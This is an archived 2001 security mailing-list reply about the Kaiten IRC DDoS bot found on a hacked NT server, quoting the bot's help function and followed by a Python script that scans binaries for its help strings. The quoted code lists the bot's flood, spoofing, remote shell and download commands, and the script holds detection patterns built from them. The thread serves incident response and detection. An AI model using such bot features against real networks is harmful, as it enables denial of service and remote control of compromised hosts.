This appears to be a DDoS tool for IRC. From kaiten.c help function
(http://packetstorm.securify.com/DoS/kaiten.c):

    void help(int sock, char *sender, int argc, char **argv) {
            if (mfork() != 0) return;
            Send(sock,"NOTICE %s :GET <http address> <save as> = Downloads a file off the web and saves it onto the hd\n",sender); sleep(2);
            Send(sock,"NOTICE %s :TSUNAMI <target> <secs> = Special packeter that wont be blocked by most firewalls\n",sender); sleep(2);
            Send(sock,"NOTICE %s :NICK <nick> = Changes the nick of the knight\n",sender); sleep(2);
            Send(sock,"NOTICE %s :GETSPOOF = Gets the current spoofing\n",sender); sleep(2);
            Send(sock,"NOTICE %s :PAN <target> <secs> = An advanced syn flooder that will kill most network drivers\n",sender); sleep(2);
            Send(sock,"NOTICE %s :UDP <target> <port> <secs> = My special++ exploit\n",sender); sleep(2);
            Send(sock,"NOTICE %s :SPOOFS <subnet> = Changes spoofing to a subnet\n",sender); sleep(2);
            Send(sock,"NOTICE %s :DNS <host> = DNSs a host\n",sender); sleep(2);
            Send(sock,"NOTICE %s :CHECKSUM <on/off> = Turns checksum on or off\n",sender); sleep(2);
            Send(sock,"NOTICE %s :IRC <command> = Sends this command to the server\n",sender); sleep(2);
            Send(sock,"NOTICE %s :SH <command> = Executes a command\n",sender); sleep(2);
            Send(sock,"NOTICE %s :KILLALL = Kills all current packeting\n",sender); sleep(2);
            Send(sock,"NOTICE %s :KILL = Kills the knight\n",sender); sleep(2);
            Send(sock,"NOTICE %s :DISABLE = Disables all packeting from this knight\n",sender); sleep(2);
            Send(sock,"NOTICE %s :ENABLE = Enables all packeting from this knight\n",sender); sleep(2);
            Send(sock,"NOTICE %s :VERSION = Requests version of knight\n",sender); sleep(2);
            Send(sock,"NOTICE %s :HELP = Displays this\n",sender);
            exit(0);
    }

Youn Gonzales
System Administrator
CLAS Net Inc.
Comptia A+, Network+
Cisco CCNA
Chicken is tasty..

----- Original Message -----
From: "C Boening" <txfmfdocat_private>
To: <INCIDENTSat_private>
Sent: Sunday, May 06, 2001 9:45 AM
Subject: Kaiten.exe DoS ?

> Has anyone ever heard of a DoS named Kaiten? I have been able to find
> only one relevant reference on the net for kaiten.c, which lists the
> code for it. I have found on one of my servers a program named
> Kaiten.exe (installed on 15 April 01, two minutes AFTER someone hacked
> into one of our other servers using the IIS unicode exploit. The intruder
> put kaiten.exe at the end of his script used to hack in) for which I
> have found absolutely no info anywhere. OS is WinNT server 4.0 . File
> size for Kaiten.exe is 52 k's, whereas the kaiten.c is only 32 k's. I am
> new to the whole security business, moving up from tech support... I
> have copied Kaiten.exe on an NT box removed from the network and sure
> enough it tried to connect to the internet ...

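Added example, not part of the original thread and not code from kaiten.c: a triage check that tells whether an unknown binary such as the Kaiten.exe described above carries the help strings quoted in the reply. The marker list is copied from that excerpt; the function names, the threshold of 3 and the sample bytes are assumptions made for this illustration.

```python
import sys

# Format strings copied from the kaiten.c help() excerpt quoted in this thread.
MARKERS = [
    "NOTICE %s :TSUNAMI <target> <secs>",
    "NOTICE %s :PAN <target> <secs>",
    "NOTICE %s :UDP <target> <port> <secs>",
    "NOTICE %s :SPOOFS <subnet>",
    "NOTICE %s :GETSPOOF",
    "NOTICE %s :KILLALL",
    "Changes the nick of the knight",
    "Disables all packeting from this knight",
]

def find_markers(data: bytes) -> dict:
    """Return {marker: (offset, encoding)} for each help string present in data."""
    hits = {}
    for marker in MARKERS:
        # A C string literal compiles to ASCII bytes; UTF-16LE is checked too
        # in case a Windows build stored the text as wide characters.
        for encoding in ("ascii", "utf-16-le"):
            offset = data.find(marker.encode(encoding))
            if offset != -1:
                hits[marker] = (offset, encoding)
                break
    return hits

def assess(data: bytes, threshold: int = 3) -> dict:
    """Summarise the match. threshold is an assumed cut-off, not a published rule."""
    hits = find_markers(data)
    return {"hits": hits, "matched": len(hits), "total": len(MARKERS),
            "likely_kaiten": len(hits) >= threshold}

def constructed_sample() -> bytes:
    """Constructed stand-in for a binary: a fake header plus three help strings."""
    return (b"MZ\x90\x00" + b"\x00" * 60
            + b"NOTICE %s :TSUNAMI <target> <secs> = Special packeter\n\x00"
            + b"NOTICE %s :GETSPOOF = Gets the current spoofing\n\x00"
            + b"NOTICE %s :KILLALL = Kills all current packeting\n\x00")

if __name__ == "__main__":
    # With a path argument, scan that file; otherwise scan the constructed sample.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else constructed_sample()
    result = assess(data)
    for marker, (offset, encoding) in result["hits"].items():
        print(f"0x{offset:06x} {encoding:9} {marker}")
    print(f"{result['matched']}/{result['total']} markers, "
          f"likely kaiten.c build: {result['likely_kaiten']}")
```

A file with no hits is not cleared by this check: a packed or edited build would not contain the strings in plain form, so read the copy on an isolated host rather than executing it.
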
This archive was generated by hypermail 2b30 : Mon May 07 2001 - 14:09:19 PDT